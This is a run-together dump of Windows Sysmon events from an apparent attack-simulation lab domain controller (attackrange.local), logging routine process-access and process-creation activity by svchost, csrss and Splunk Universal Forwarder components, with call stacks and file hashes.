13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9363-6005-D304-00000000A301}2672C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9363-6005-D304-00000000A301}2672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.014{59A5CD1D-9363-6005-D304-00000000A301}2672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.841{59A5CD1D-9364-6005-D504-00000000A301}6321112C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9364-6005-D504-00000000A301}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9364-6005-D504-00000000A301}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9364-6005-D504-00000000A301}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-9364-6005-D504-00000000A301}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.169{59A5CD1D-9364-6005-D404-00000000A301}12084612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9364-6005-D404-00000000A301}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 